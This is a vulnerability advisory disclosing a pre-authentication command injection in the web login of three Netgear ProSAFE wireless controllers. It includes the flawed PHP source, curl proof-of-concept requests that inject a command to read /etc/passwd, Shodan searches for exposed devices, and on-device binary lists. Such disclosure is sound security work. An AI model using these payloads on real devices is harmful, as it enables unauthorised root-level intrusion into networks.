################################################################################
METADATA DETAILS
Title:
ACSA-2015-002
Timeline:
16 Oct 2015 - [Researcher] discovery
02 Dec 2015 - [Researcher] sends vendor notification at security@netgear.com, public disclosure set for 28 Dec 2015
08 Dec 2015 - [Researcher] sends vendor notification at security@netgear.com with all the details an PoC, public disclosure set for 28 Dec 2015
16 Dec 2015 - [Vendor] replies requesting "a standard 90-days grace period before public disclosure" and to fill "NETGEAR Product Vulnerability Reporting Submission Form.xlsx"
17 Dec 2015 - [Researcher] replies with filled "ACSA-2015-002 - NETGEAR Product Vulnerability Reporting Submission Form.xlsx", agrees to 90-days grace period, asks vendor to created CVE numbers and notify/acknowledge the researcher
12 Jan 2016 - [Researcher] follows-up with the vendor on the status and CVE numbers
12 Jan 2016 - [Vendor] notifies researcher its team is unable to reproduce this vulnerability and "NETGEAR's Wireless Controller dev team would like to request a conference call with you and the technical team lead to discuss the findings which they are not able to reproduce"
04 Mar 2016 - [Researcher] sends screencast to the vendor on how to reproduce the vulnerability, reminds about 90-days grace period and public disclosure 31 Mar 2016
17 Mar 2016 - Expires 90-days grace period
31 Mar 2016 - [Researcher] proceeds to public disclosure
Author:
Andrei Costin, "FIRMWARE.RE" project
andrei@firmware.re
Vulnerability discovered using "FIRMWARE.RE" platform/service
0. Vulnerability:
Pre-auth Remote Command Execution/Injection (RCE/RCI) in the web interface can allow attackers to effectively gaining root (webserver user) access on the device
1. Vulnerable products:
Netgear ProSAFE WC9500
Netgear ProSafe WC7600
Netgear ProSafe WC7520
***
Netgear ProSAFE WC9500 High Capacity Wireless Controller ~ 4000-5000 USDS
The ProSAFE WC9500 High Capacity Wireless Controller is a scalable, high
performance WLAN solution for centralized management of up to 200 ProSAFE
wireless access points in a single wireless controller. Three WC9500 Wireless
Controller can stack into a single cluster to support up to 600 Access Points,
with a fourth WC9500 acting as a redundant backup. The supported AP’s
extends from entry level single band WNAP210/WNAP320/WN370 APs to dual band
business class WNDAP360/350, and premium grade 3x3 WNDAP660/620, and outdoor
WND930 AP’s, and is also 802.11ac ready. The WC9500 Wireless Controller
is easy to configure with an intuitive user interface and setup wizard,
comprehensive dashboard and monitoring statistics. Flexible enough to
support a few dozen laptops to several thousand tablets, it delivers
enterprise grade functionality for mid to large-sized organizations,
but without the cost and complexity of big IT. The WC9500 comes fully
equipped with enterprise grade features such as comprehensive wireless
security (WPA, WPA2, Radius, LDAP, Rogue AP protection), guest access,
and full networking functionality including embedded DHCP server, VLAN on
wired and wireless networks support, to full Quality of Service d
ifferentiation. Additionally, with no recurring annual license fees:
Simply pay as you grow.
***
Netgear ProSafe WC7600 Wireless LAN Controller ~ 2000-3000 USD
The NETGEAR ProSAFE WC7600 Premium Wireless Controller is a fully
featured enterprise class, high performance and secured wireless controller
capable of managing up to 150 Access Points and 6,000 concurrent clients
per cluster. The WC7600 delivers ultra-fast Access Point discovery, Layer 2
and Layer 3 fast roaming, multiple 10 Gigabit connectivity, a captive portal
for guest access, fully distributed architecture, and ease of configuration and
management.
The NETGEAR ProSAFE WC7600 Premium Wireless Controller manages the
full line of NETGEAR ProSAFE Access Points, from entry level single band APs
(WNAP210 and WNAP320), business class dual band APs (WNDAP350 and
WNDAP360), high performance 3x3:450Mbps per radio dual band selectable
and concurrent APs (WNDAP620 and WNDAP660), to specialized in-wall
mounted APs (WN370), all with a single click of a mouse.
Unlike other Wireless systems that are costly, complex and cumbersome to
deploy, the WC7600 wireless controller is ideal for K-12 education, hospitality,
and healthcare deployments. Designed with simplicity in mind for management
and ease of use, it offers enterprise grade functionality and capability for small
to mid-sized organizations, without the cost and complexity of big IT.
***
Netgear ProSafe WC7520 20-AP Wireless Controller ~ 1000-1700 USD
The NETGEAR ProSafe 20-AP Wireless Controller WC7520 offers a
high-performance and fully-featured Wireless LAN architecture to meet the
demands of medium-sized businesses, schools, and hospitals with thousands
of users. Focusing on ease-of-use, the WC7520 Controller simplifies wireless
deployments and network management with best-in-class wireless reliability,
coverage, and performance. The scalable WC7520 Controller enables businesses
to grow their wireless network as needed with a dramatic return on investment,
with optional licenses that support their changing needs. Via licensing
upgrades, the ProSafe Wireless Controller scales up to 50 access points (AP).
For larger deployments, the WC7520 Controller is stackable up to three units,
supporting up to 150-APs, including controller redundancy. Meeting the next
generation needs of larger installations, the WC7520 Controller delivers
central wireless management, integrated wireless mobility, robust top-end
security and rich converged services such as L2/L3 fast roaming, guest access
captive portal and Voice over Wi-Fi support. Built to last, the WC7520
Controller is backed by a Lifetime Warranty and delivers enterprise-class
connectivity and secure wireless LAN functionality.
***
1.1 Is it for Home / Business / Service Provider, is it a Router, Wifi, Camera, Storage, etc
Business / Enterprise / Service Provider
1.2. Vulnerable firmware:
The latest firmware of each product (as of 16 Oct 2015) was tested to be vulnerable.
2. What are the requirements to attack the affected products?
Being able to ping the affected device and open it's web interface
(192.168.1.1 or 192.168.1.254)
Being connected to the Ethernet or WiFi medium of the product, i.e.:
- if WiFi requires WLAN authentication must first WLAN-authenticate;
- if WiFi is open or Ethernet LAN is accessible, then there are no
other requirements then to be able to access the device web interface
(192.168.0.1 or 192.168.1.254)
2.1 WWW/WAN interfaces - does it mean that any device of this sort one can find using Shodan on the Internet, one can attack?
Yes.
https://www.shodan.io/search?query=WC7520
https://www.shodan.io/search?query=WC7600
https://www.shodan.io/search?query=WC9500
2.2 Any particular configuration required?
No.
2.3 Is the default (factory reset) version of the product affected?
Unknown, but most likely yes.
2.4 Is there a configuration change that can make the product unaffected? (turning off UPnP for example?)
No.
3. Regarding the "Pre Auth OS Command Injection" what are the requirements for this one?
- Being able to ping the affected device and open it's web interface
(192.168.1.1 or 192.168.1.254)
3.1 What commands can be injected?
Any.
See below for a full list of commands/executables present on the affected systems.
3.2 Can parameters to this command be provided?
Yes.
3.3 Is there any restrictions on the command line "characters", for example one can only provide alpha numeric characters?
No restrictions as far as tested and analyzed.
################################################################################
TECHNICAL DETAILS
The affected systems perform the login of web interface users using the "login_handler.php" module.
The "login_handler.php" module calls the "doLogin()" function within the "/include/scripts/login_menu.js".
The doLogin() function is a simple AJAX call wrapper as follows:
function doLogin() {
new ajaxRequest().sendRequest("auth_user",
$H($("login_form").serialize(true)).toJSON(),
handleLoginResp);
return false;
}
The AJAX requests reach the "do_login" function in the "common.php" module, the place where is the root cause of the vulnerability.
The start of the "do_login" function in the "common.php" module looks as follows:
function do_login() {
/*Assignment operation happening instead of conditional check which is not valid.
* Moreover i don't know why this if statment is written here even before a value is assigned to $user_type
* variable. Currently removing this statment have solved the issue of mutliplea admin user login.
*/
/*if($user_type = validate_session_info(true)) {
return 0;
}*/
$retval = 0;
$session_file_name = "/tmp/session_".$_SERVER["SERVER_ADDR"].".bin";
$url_enc_str = rawurlencode(stripslashes($_POST["jsonData"]));
system("/wnc/bin/json_cli \"".($_POST["reqMethod"]=="session_force_auth_user"?"force_auth_user":$_POST["reqMethod"])."\" \"".$url_enc_str."\"", $retval);
//Error code 253 (Not supported method) and 254 (Invalid format) are returned from json cli, if the arguments are incorrect
if($retval == 0 || $retval == 253 || $retval == 254) {
return 1;
}
We can see there is a "system()" PHP call to "/wnc/bin/json_cli" where the command line is created by simple unsanitized concatenation.
In particular, this part, i.e., the ternary operator ($_POST["reqMethod"]=="session_force_auth_user"?"force_auth_user":$_POST["reqMethod"]) of the command line concatenation is where the attack occurs.
The attacker controls the POST request.
By supplying a POST input called "reqMethod" that is not equal to "session_force_auth_user" AND which contains the command to be injected, the attacker controlled command call will be concatenated to the system call by the second part of the ternary operator, i.e., :$_POST["reqMethod"].
################################################################################
POC DETAILS
The PoC to trigger command execution is as follows, where the command to be injected is 'cat /etc/passwd':
curl --data 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; cat "/etc/passwd' http://wc9500/login_handler.php
curl --data 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; cat "/etc/passwd' http://wc7600/login_handler.php
curl --data 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; cat "/etc/passwd' http://wc7520/login_handler.php
################################################################################
QUICK FIX
Sanitize parameters passed to the "system("/wnc/bin/json_cli...")" call.
################################################################################
SOFTWARE ENVIRONMENT DETAILS
WC9500
Latest FW version: 5.1.0.17
Kernel-space:
Linux "2.6.35.6 SMP mod_unload x86-64 64BIT LSB"
User-space:
BusyBox v1.2.1 (2015.09.18-07:36+0000) multi-call binary
/bin
addgroup cat dd domainname grep login mknod nice ps sed ssh stty tracepath6 usleep
adduser chgrp delgroup echo gunzip ls mktemp nisdomainname pwd setpci ssh-add su traceroute6 vi
arping chmod deluser egrep gzip lsmod more pidof rm sftp ssh-agent sync true watch
ash chown df false hostname lspci mount ping rmdir sh ssh-keygen tar umount wncinit
busybox cp dmesg fgrep kill microperl mv ping6 run-parts sleep ssh-keyscan touch uname ypdomainname
date dnsdomainname getopt ln mkdir netstat pipe_progress scp slogin stat tracepath uncompress zcat
/sbin
arp fdisk fsck.ext3 hdparm ifstat klogd mke2fs modinfo pivot_root reboot routel rtstat swapon tc
ctstat freeramdisk genl hwclock init lnstat mkfs.ext2 modprobe plipconfig rmmod rtacct slattach start-stop-daemon switch_root udhcpc
depmod fsck getty ifcfg insmod logread mkfs.ext3 nameif poweroff route rtmon ss sulogin sysctl vconfig
e2fsck fsck.ext2 halt ifconfig ip losetup mkswap nstat rc routef rtpr sshd swapoff syslogd
/usr/bin
[ awk cal cmp deallocvt dumpleases fold fuser id less mkfifo nslookup patch reset sort tee time tty wc whoami
[[ basename chvt cpu-load diff env free head install logger nc od printf rx strace telnet top uniq wget xargs
ar bunzip2 cksum crontab dirname expr ftpget hexdump iozone md5sum net-load openvt readlink seq strings test tr unzip which yes
arping bzcat clear cut du find ftpput hostid killall mesg nohup passwd renice sha1sum tail tftp traceroute uptime who
/usr/sbin
brctl chroot crond ethtool httpd inetd mii-tool tcpdump telnetd udhcpd
################################################################################
WC7600
Latest FW version: 5.1.0.17
Kernel-space:
Linux "2.6.35.6 SMP mod_unload x86-64 64BIT LSB"
User-space:
BusyBox v1.2.1 (2015.09.21-05:54+0000) multi-call binary
/bin
addgroup cat dd domainname grep login mknod nice ps sed ssh stty tracepath6 usleep
adduser chgrp delgroup echo gunzip ls mktemp nisdomainname pwd setpci ssh-add su traceroute6 vi
arping chmod deluser egrep gzip lsmod more pidof rm sftp ssh-agent sync true watch
ash chown df false hostname lspci mount ping rmdir sh ssh-keygen tar umount wncinit
busybox cp dmesg fgrep kill microperl mv ping6 run-parts sleep ssh-keyscan touch uname ypdomainname
date dnsdomainname getopt ln mkdir netstat pipe_progress scp slogin stat tracepath uncompress zcat
/sbin
arp fdisk fsck.ext3 hdparm ifstat klogd mke2fs modinfo pivot_root reboot routel rtstat swapon tc
ctstat freeramdisk genl hwclock init lnstat mkfs.ext2 modprobe plipconfig rmmod rtacct slattach start-stop-daemon switch_root udhcpc
depmod fsck getty ifcfg insmod logread mkfs.ext3 nameif poweroff route rtmon ss sulogin sysctl vconfig
e2fsck fsck.ext2 halt ifconfig ip losetup mkswap nstat rc routef rtpr sshd swapoff syslogd
/usr/bin
[ awk cal cmp deallocvt dumpleases fold fuser id less mkfifo nslookup patch reset sort tee time tty wc whoami
[[ basename chvt cpu-load diff env free head install logger nc od printf rx strace telnet top uniq wget xargs
ar bunzip2 cksum crontab dirname expr ftpget hexdump iozone md5sum net-load openvt readlink seq strings test tr unzip which yes
arping bzcat clear cut du find ftpput hostid killall mesg nohup passwd renice sha1sum tail tftp traceroute uptime who
/usr/sbin
brctl chroot crond ethtool httpd inetd mii-tool tcpdump telnetd udhcpd
################################################################################
WC7520
Latest FW version: 2.5.0.35
Kernel-space:
Linux "2.6.27.7-Cavium-Octeon SMP mod_unload OCTEON 64BIT MIPS64 rel2 version 1 LSB"
User-space:
BusyBox v1.2.1 (2015.04.22-12:18+0000) multi-call binary
/bin
addgroup cat dd domainname grep login mknod nice pipe_progress scp slogin stat tracepath uncompress zcat
adduser chgrp delgroup echo gunzip ls mktemp nisdomainname ps sed ssh stty tracepath6 usleep
arping chmod deluser egrep gzip lsmod more opentftpd pwd setpci ssh-add su traceroute6 vi
ash chown df false hostname lspci mount pidof rm sftp ssh-agent sync true watch
busybox cp dmesg fgrep kill microperl mv ping rmdir sh ssh-keygen tar umount wncinit
busybox date dnsdomainname getopt ln mkdir netstat ping6 run-parts sleep ssh-keyscan touch uname ypdomainname
/sbin
arp fdisk fsck.ext2 halt ifconfig klogd mke2fs mkswap nameif poweroff rmmod sshd sulogin switch_root udhcpc
depmod freeramdisk fsck.ext3 hdparm init logread mkfs.ext2 modinfo pivot_root rc route swapoff sysctl vconfig
e2fsck fsck getty hwclock insmod losetup mkfs.ext3 modprobe plipconfig reboot slattach start-stop-daemon swapon syslogd
/usr/bin
[ cal deallocvt expr fold install lockstat-test nandwrite oct-linux-jtg readlink strings top wget
[[ chvt diff find free iozone logger nc oct-linux-mdio renice sumtool tr which
ar cksum dirname flashcp ftl_check jffs2dump md5sum net-load od reset tail traceroute who
arping clear docfdisk flash_erase ftl_format gdbserver killall mesg nftldump oncpu rx tee tty whoami
awk cmp doc_loadbios flash_eraseall ftpget head ldd mkfifo nftl_format openvt seq telnet uniq xargs
basename cpu-load du flash_info ftpput hexdump less mkfs.jffs2 nohup passwd sha1sum test unzip yes
bunzip2 crontab dumpleases flash_lock fuser hostid locale mtd_debug nslookup patch sort tftp uptime
bzcat cut env flash_unlock gdb id localedef nanddump oct-linux-identify printf strace time wc
/usr/sbin
brctl chroot crond ctstat ethtool httpd ifcfg ifstat inetd ip lnstat mii-tool nstat routef routel rtacct rtmon rtpr rtstat ss tc tcpdump telnetd udhcpd
################################################################################
About the author/project:
Firmware.RE is part of the Firmware Genome Project.
Firmware.RE is a free online service that:
- unpacks, scans and analyzes almost any firmware package and facilitates the quick detection of vulnerabilities, backdoors and all kinds of embedded malware.
- facilitates firmware mounting, modification, loading and emulation.
- facilitates firmware vulnerability and backdoor discovery.
- helps secure your embedded and internet-of-things devices.
